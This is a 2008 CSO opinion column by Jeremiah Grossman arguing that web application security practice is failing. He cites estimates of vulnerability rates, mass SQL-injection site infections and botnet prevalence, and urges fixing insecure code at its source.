Industry View: Web Application Security Today - Are We All Insane?
WhiteHat Security's Jeremiah Grossman believes the current approach to Web application security is the very picture of insanity
By Jeremiah Grossman
July 02, 2008 — CSO —
Seventeen million programmers are churning out an estimated 102 billion new lines of code per year. Add 162 million websites online, with 809,000 using SSL (an indication of valuable data) and the problem becomes apparent. Researchers estimate that roughly one security defect exists per 10,000 lines of code and nine out of 10 websites contain one or more serious vulnerabilities. If only 1 percent of security defects are exploitable that means we are generating 102,000 zero-days per year - we just don't know where most of them are. Even if 90 percent of the SSL websites contained only a single issue, 728,100 website vulnerabilities are already in circulation, and we don't know where those are, either.
While web application security was clearly recognized as a big problem several years ago, many organizations were slow to act. Now Web application exposure has reached the crisis stage because criminals have taken notice and made Web applications their primary target. There's an old proverb that explains how to determine whether or not someone is sane. An individual is shown a river flowing into a pond. He is given a bucket and asked to drain the pond. If he walks to the stream to dam the inflow into the pond he will be considered sane. If he decides to empty the pond with his bucket without first stopping the inflow then he would be considered insane. This is analogous to today's approach to software security, and specifically Web application security.
While the data (think credit card and Social Security numbers) contained in websites can be highly attractive, so too is the ability to access unsuspecting users of the website. In what has become an incredibly common attack, cyber criminals penetrate one of a website's many weak spots and silently lace the Web pages with malicious code. When visitors arrive, their Web browser is automatically exploited and their machine loaded with Trojan horses designed to steal passwords, send spam, attack other computers, and more.
In April 2008, a single massive hack infected hundreds of thousands of Web pages using a sophisticated form of blind SQL Injection. Something we thought technically possible turned real, right before our eyes.
The problem has gotten so bad that industry sources say most websites hosting malware have been hacked, Google says 1.3 percent of their search queries return malicious content, and Vint Cerf (father of the Internet) approximates that one quarter of all PCs are part of a botnet. Firewalls are not working. Antivirus/spyware is not working, nor are weekly patching, user education, SSL, or "turning off the home computer" as recommended by the FBI cyber-crime website. In what has become an inside joke, every authority says to use these "best-practices" despite their ineffectiveness.